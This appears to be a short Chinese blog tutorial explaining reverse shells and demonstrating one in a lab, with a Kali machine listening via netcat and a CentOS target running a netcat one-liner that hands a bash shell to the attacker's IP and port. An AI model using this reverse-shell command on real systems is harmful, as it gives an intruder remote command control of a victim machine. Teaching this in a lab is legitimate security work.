反弹shell

目录

前言

反弹shell

攻击机监听本机端口

被攻击机发起连接

攻击机操作


前言

反弹shell是一种网络技术,主要用于在攻击者和被攻击者之间建立命令行的输入输出控制通道。与常规的远程连接方式不同,反弹shell是由被攻击者主动向外连接攻击者,而不是由攻击者连接到被攻击者。

反弹shell通常用于被控端受到防火墙限制、无法接受外部连接、或者IP地址动态变化等情况。这种技术确保即使被控设备位于内部网络中,或者由于某些安全限制无法被直接访问时,攻击者依然能够实现远程控制。


反弹shell

攻击机kali ip 192.168.100.222

被攻击机centos ip 192.168.100.130

攻击机监听本机端口

nc -lvp 空闲端口

nc -lvp 4444


被攻击机发起连接

nc -e /bin/bash 攻击机ip 攻击机监听端口

nc -e /bin/bash 192.168.100.222 4444

如果没有报错或者退出当前命令行,说明连接建立成功


攻击机操作

回到攻击机:

结果显示连接成功

这是就可以进行进一步命令操作了:



相关推荐
海洲探索-Hydrovo1 小时前
TTP Aether X 天通透传模块丨国产自主可控大数据双向通讯定位模组
网络·人工智能·科技·算法·信息与通信
半梦半醒*4 小时前
zabbix安装
linux·运维·前端·网络·zabbix
你的人类朋友5 小时前
“签名”这个概念是非对称加密独有的吗?
前端·后端·安全
南尘NCA86665 小时前
企业微信防封防投诉拦截系统:从痛点解决到技术实现
java·网络·企业微信
板鸭〈小号〉5 小时前
Socket网络编程(2)-command_server
运维·服务器
程序猿费益洲6 小时前
Docker 网络详解:(三)四大网络模式
网络·docker·容器
携欢6 小时前
PortSwigger靶场之CSRF where token validation depends on request method通关秘籍
安全·web安全·csrf
周杰伦_Jay6 小时前
【计算机网络表格图表解析】网络体系结构、数据链路层、网络层、传输层、应用层、网络安全、故障排查
计算机网络·安全·web安全
Mr_Meng_De7 小时前
网络安全认证培训机构的痛点
网络
派阿喵搞电子8 小时前
关于使用docker部署srs服务器的相关指令
服务器·docker·容器